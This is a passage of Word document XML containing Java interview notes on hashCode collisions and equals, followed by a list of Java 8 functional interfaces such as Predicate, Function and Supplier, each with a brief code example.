      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14D6B658"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0C1E0BCA"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int hashCode() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B6F23C"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42; // All instances of Person will have the same hash code (42)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4077EE4B"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3FD8EE2" w14:textId="77777777" w:rsidR="00B71D27" w:rsidRPr="00CE4B95" w:rsidRDefault="00B71D27" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="415F538F"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01157E87"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boolean equals(Object obj) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A3B1E6"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this == obj) return true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EC8885"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obj == null || getClass() != obj.getClass()) return false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173E0BA1"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erson person = (Person) obj;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4250EF40"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age == person.age &amp;&amp; name.equals(person.name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F73E95"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928B17E"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92E2708" w14:textId="77777777" w:rsidR="00B71D27" w:rsidRPr="00CE4B95" w:rsidRDefault="00B71D27" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A9C4C33"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392428C1"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3B3C40FE"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erson p1 = new Person("Alice", 30);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119611B0"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erson p2 = new Person("Bob", 25);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4531565E" w14:textId="77777777" w:rsidR="00B71D27" w:rsidRPr="00CE4B95" w:rsidRDefault="00B71D27" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10CB2E4A"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HashMap&lt;Person, String&gt; map = new HashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBB9410"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p1, "Person 1");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002C1916"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p2, "Person 2");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CB0A5A" w14:textId="77777777" w:rsidR="00B71D27" w:rsidRPr="00CE4B95" w:rsidRDefault="00B71D27" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="265902BA"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heck if the map works correctly despite the hash collision</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCA6E3D"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map.get(p1)); // Output: Person 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F3FDBD"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map.get(p2)); // Output: Person 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525A24DC"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744E6A8"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951B9F5" w14:textId="77777777" w:rsidR="00B71D27" w:rsidRPr="00CE4B95" w:rsidRDefault="00B71D27"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y Do Hash Collisions Occur?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F57E0AB" w14:textId="77777777" w:rsidR="00B71D27" w:rsidRPr="00CE4B95" w:rsidRDefault="00B71D27" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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mited Range of hashCode()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hashCode()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> method returns a 32-bit integer, which means there are only 2^32 possible values for the hash code. Since there are infinite possible objects, it's inevitable that different objects might end up with the same hash code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5952D2D7" w14:textId="77777777" w:rsidR="00B71D27" w:rsidRPr="00CE4B95" w:rsidRDefault="00B71D27" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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bject Fields Affect Hash Code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If your hashCode() method is based on a small subset of object fields, two objects with different field values could still end up with the same hash code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596F7053" w14:textId="77777777" w:rsidR="00B71D27" w:rsidRPr="00CE4B95" w:rsidRDefault="00B71D27"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ow to Handle Hash Collisions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23350169" w14:textId="77777777" w:rsidR="00B71D27" w:rsidRPr="00CE4B95" w:rsidRDefault="00B71D27" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48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verride equals() and hashCode()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Always override both methods to ensure that objects with the same values for their fields are considered equal. This will prevent collisions from causing incorrect behavior in hash-based collections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4383EA24" w14:textId="77777777" w:rsidR="00B71D27" w:rsidRPr="00CE4B95" w:rsidRDefault="00B71D27" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48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Distribute Hash Codes Evenly</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When overriding hashCode(), try to ensure that the hash codes are distributed evenly to minimize collisions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BA4E7B" w14:textId="77777777" w:rsidR="00B71D27" w:rsidRPr="00CE4B95" w:rsidRDefault="00B71D27"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246191A3" w14:textId="77777777" w:rsidR="00B71D27" w:rsidRPr="00CE4B95" w:rsidRDefault="00B71D27"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ile it is possible for multiple objects to have the same </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hashCode()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, proper implementation of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>equals()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> method ensures that these collisions do not affect the correctness of hash-based collections. You should design your hashCode() method to minimize collisions but be aware that they are inevitable in some cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668DCDC2" w14:textId="4AE6A864"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E714812">
          <v:rect id="_x0000_i1223" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="44355C22" w14:textId="57C4EE03" w:rsidR="00EB7E74" w:rsidRPr="00CE4B95" w:rsidRDefault="00447E10">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="_Toc196307558"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Enlist a few predefined interfaces from Java 8</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p w14:paraId="19455498" w14:textId="6EE06875" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">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Java 8 introduced several predefined interfaces that are part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>java.util.function</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> package, which are extensively used for functional programming, especially with lambdas and streams. Some key predefined interfaces in Java 8 are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CAFA6D" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70"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Predicate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF5EBB4" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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presents a boolean-valued function of one argument.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31605CDD" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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monly used for filtering or matching conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D76985" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF7E7FC" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">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edicate&lt;Integer&gt; isEven = n -&gt; n % 2 == 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738B9220" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">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isEven.test(4)); // true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C71BED3" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70"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Function&lt;T, R&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B27F64" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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presents a function that takes an argument of type T and produces a result of type R.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CDF7E4" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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monly used for transformation operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CABDA7D" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E9E67E" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">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nction&lt;String, Integer&gt; stringLength = s -&gt; s.length();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133C5DFF" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">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stringLength.apply("Hello")); // 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEEBA89" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70"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Consumer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A76C468" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48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presents an operation that accepts a single input argument and returns no result (void).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59598AD1" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48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monly used for operations that only consume a value, like printing or modifying an object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2F673D" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44987DE7" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">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sumer&lt;String&gt; printUpperCase = s -&gt; System.out.println(s.toUpperCase());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2922F297" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">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intUpperCase.accept("hello"); // HELLO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC1655F" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70"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Supplier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625AB12C" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49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presents a supplier of results, i.e., it produces a result of type T but doesn't take any input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4BBFA6" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49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monly used when you need to generate values or create new objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110414E8" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A2B456" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">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pplier&lt;Double&gt; randomValue = () -&gt; Math.random();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50ED3FF3" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">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randomValue.get()); // prints a random number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BB3F05" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70"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UnaryOperator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026D7252" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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special case of Function&lt;T, T&gt;, which represents a function that takes an argument of type T and returns a result of the same type T.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC75C8D" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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ften used for operations that modify or process the same type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A365FDE" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4308C5E7" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">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naryOperator&lt;Integer&gt; doubleValue = n -&gt; n * 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429D0B3B" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">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doubleValue.apply(4)); // 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC4A7E2" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70"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BinaryOperator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C694D97" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49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special case of BiFunction&lt;T, T, T&gt;, which represents a function that takes two arguments of the same type T and returns a result of the same type T.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED24E15" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49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monly used for combining two values of the same type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350A4642" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66362884" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">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inaryOperator&lt;Integer&gt; add = (a, b) -&gt; a + b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BD484A" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">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add.apply(2, 3)); // 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668B0DC8" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70"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7. BiFunction&lt;T, U, R&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9C95C2" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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presents a function that takes two arguments, one of type T and the other of type U, and returns a result of type R.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352A2718" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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ful for operations that require two arguments and return a result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2A81B0" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BDF8BB" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="493"/>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iFunction&lt;Integer, Integer, Integer&gt; multiply = (a, b) -&gt; a * b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFBF5D3" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="493"/>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System.out.println(multiply.apply(2, 3)); // 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49127BF7" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70"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8. BiPredicate&lt;T, U&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652A842D" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49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presents a predicate (boolean-valued function) that takes two arguments, one of type T and the other of type U.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1D9D32" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2461C1" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">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iPredicate&lt;Integer, Integer&gt; isSumEven = (a, b) -&gt; (a + b) % 2 == 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C6F3BE" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">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isSumEven.test(1, 3)); // true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B819690" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70"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9. Comparator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357A0AA6" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49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presents a comparison function, which is used to compare two objects of type T for sorting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F7515B" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49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monly used with collections like List.sort() or Collections.sort().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF8DBBD" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3512A6AC" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="495"/>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arator&lt;Integer&gt; compareAsc = (a, b) -&gt; a - b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2790D320" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="495"/>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compareAsc.compare(3, 5)); // -2 (3 is less than 5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0046C4" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687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0. Optional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A7CCBA" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49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though not part of java.util.function, Optional is a predefined class that was introduced in Java 8.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6601C3" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49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represents a container for possibly null values, providing methods to handle null more gracefully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135EA255" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
